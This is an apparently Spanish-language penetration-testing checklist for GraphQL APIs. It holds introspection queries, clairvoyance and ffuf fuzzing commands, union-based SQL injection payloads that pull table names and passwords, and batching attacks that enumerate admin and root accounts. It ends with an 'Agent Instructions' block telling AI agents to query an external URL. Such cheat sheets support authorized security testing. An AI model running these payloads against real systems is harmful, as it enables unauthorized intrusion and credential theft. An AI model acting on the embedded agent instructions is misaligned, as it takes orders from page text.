# GraphQL
## Checklist
* [ ] Consola de GraphQL expuesta (GraphQL development console).
* [ ] Introspección habilitada (GraphQL introspection).
Versiones antiguas
```graphql
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
name
description
args {
...InputValue
}
onOperation
onFragment
onField
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type { ...TypeRef }
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
```
Versiones modernas
```graphql
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
name
description
locations
args {
...InputValue
}
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type { ...TypeRef }
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
```
Obtener mutaciones (mutations)
```graphql
query {
__schema {
mutationType {
name
fields {
name
args {
name
defaultValue
type {
...TypeRef
}
}
}
}
}
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
```
Consultar campos (input fields) de un objeto
```graphql
{
__type(name: "") {
name
inputFields {
name
description
defaultValue
}
}
}
```
* [ ] Si la introspección esta deshabilitada utilizar sugerencias de campos (GraphQL suggestions) o realizar fuzzing.
```sh
# GraphQL suggestions
clairvoyance -H ": " -c 1 -x "http://127.0.0.1:8080" --no-ssl -w -o schema.json http:///graphql --progress
# Fuzzing queries
ffuf -u http:///graphql -w :FUZZ -X POST -d "{\"query\":\"query {FUZZ}\"}" -H "Authorization: Bearer " -H "Content-Type: application/json" -c -mc all -fr "Cannot query" -o ffuf-fuzzing-graphql-queries.html -of html
```
* [ ] Depuración y divulgación de información (GraphQL error handling).
* [ ] Búsqueda de IDOR (Insecure Direct Object Reference).
* [ ] Manipular “mutaciones” (mutations), las cuales se utilizan para realizar acciones de modificación de los datos.
* [ ] Ataques de inyección (Injection attacks).
```graphql
# Union-based SQLi
{"query": "{user(username: \"x' UNION SELECT 1,2,3,4-- -\"){id,name,password}}"}
## MySQL / MariaDB
{"query": "{user(username: \"x' UNION SELECT 1,2,GROUP_CONCAT(table_name),4,5,6 FROM information_schema.tables WHERE table_schema=database()-- -\"){id,name,password}}"}
```
* [ ] Ataque por lotes (Batching attack).
```graphql
# JSON list based batching
[
{"query":"{user(username: \"user\") {id,name,password}}"},
{"query":"{user(username: \"admin\") {id,name,password}}"},
{"query":"{user(username: \"root\") {id,name,password}}"}
]
```
```graphql
# Query name based batching
{"query":"{
first: user(username:\"user\"){id,name,password}
second: user(username:\"admin\") {id,name,password}
third: user(username:\"root\") {id,name,password}
}"}
```
* [ ] Ataque de denegación de servicio (Denial-of-Service DoS attacks).
* [ ] Batching attack.
* [ ] Circular reference (Deep recursion).
* [ ] Duplicación de campo (Field duplication).
## Herramientas
### Clairvoyance
*
```sh
clairvoyance -H ": " -c -x "http://127.0.0.1:8080" --no-ssl -w -o schema.json http:///graphql --progress
```
### graphw00f
*
```sh
main.py -d -f -t
```
### GraphQL Cop
*
```sh
graphql-cop.py -t /graphql
```
### GraphQLmap
*
```sh
graphqlmap.py -u /graphql
```
### InQL
*
### GraphQL Voyager
*
*
### Altair GraphQL Client
*
*
## Wordlists
*
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://web.mrw0l05zyn.cl/explotacion/graphql.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.